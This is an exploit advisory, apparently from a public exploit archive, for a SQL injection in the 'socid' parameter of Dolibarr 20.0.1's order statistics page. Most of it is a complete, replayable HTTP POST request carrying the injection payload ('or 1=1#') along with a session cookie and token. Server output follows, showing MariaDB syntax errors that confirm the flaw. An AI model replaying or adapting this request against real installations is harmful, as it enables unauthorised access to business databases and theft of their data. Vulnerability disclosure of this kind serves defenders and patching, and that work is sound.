## Titles: dolibarr 20.0.1 Multiple security token SQLi
## Author: nu11secur1ty
## Date: 10/15/2024
## Vendor: https://www.dolibarr.org/
## Software: https://www.dolibarr.org/downloads.php
## Reference: https://portswigger.net/web-security/sql-injection## Description:
The `socid` parameter appears to be vulnerable to SQL injection attacks.
The attacker can get sensitive information for the MySQL database from this
system when he attacks it online from inside!
He can do this, by using a vulnerable security token to access the web
application!
STATUS: Medium- Vulnerability
[+]Exploits:
- SQLi Multiple:
```
POST /dolibarr-20.0.1/htdocs/commande/stats/index.php HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate, br
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie:
DOLSESSID_0297178cd410ba92966a17032c81774a6acb1ec7=hsq658oejrct1401omd4nf2c5q
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer:
http://pwnedhost.com/dolibarr-20.0.1/htdocs/commande/stats/index.php?leftmenu=orders_suppliers&mode=supplier
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129",
"Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 357
token=ac1770a37880433e4ca36f69be4a8bf2&mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&typent_id=-1&categ_id=-1&userid=1&object_status_multiselect=1&object_status%5B%5D=0&object_status%5B%5D=1&object_status%5B%5D=2&object_status%5B%5D=3&object_status%5B%5D=4&object_status%5B%5D=5&object_status%5B%5D=6%2C7&object_status%5B%5D=9&year=2024&submit=Refresh
```
[+]Response:
```SQLi
HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 10:23:43 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80974
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="author
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near
'WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31
23:59:59'...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near
'WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31
23:59:59'...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near
'WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31
23:59:59'...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near
') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31
2...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near
') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31
2...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near
') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31
2...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near
') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31
2...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near
') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31
2...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near
') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31
2...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near
') as total, AVG() as avg FROM WHERE c.entity IN (1) AND c.fk_user_author =
1...' at line 1<b
```
## Reproduce:
[href](https://www.patreon.com/posts/dolibarr-20-0-1-114038337)
## Demo PoC:
[href](
https://www.nu11secur1ty.com/2024/10/dolibarr-2001-multiple-security-token.html
)
## Time spent:
05:27:00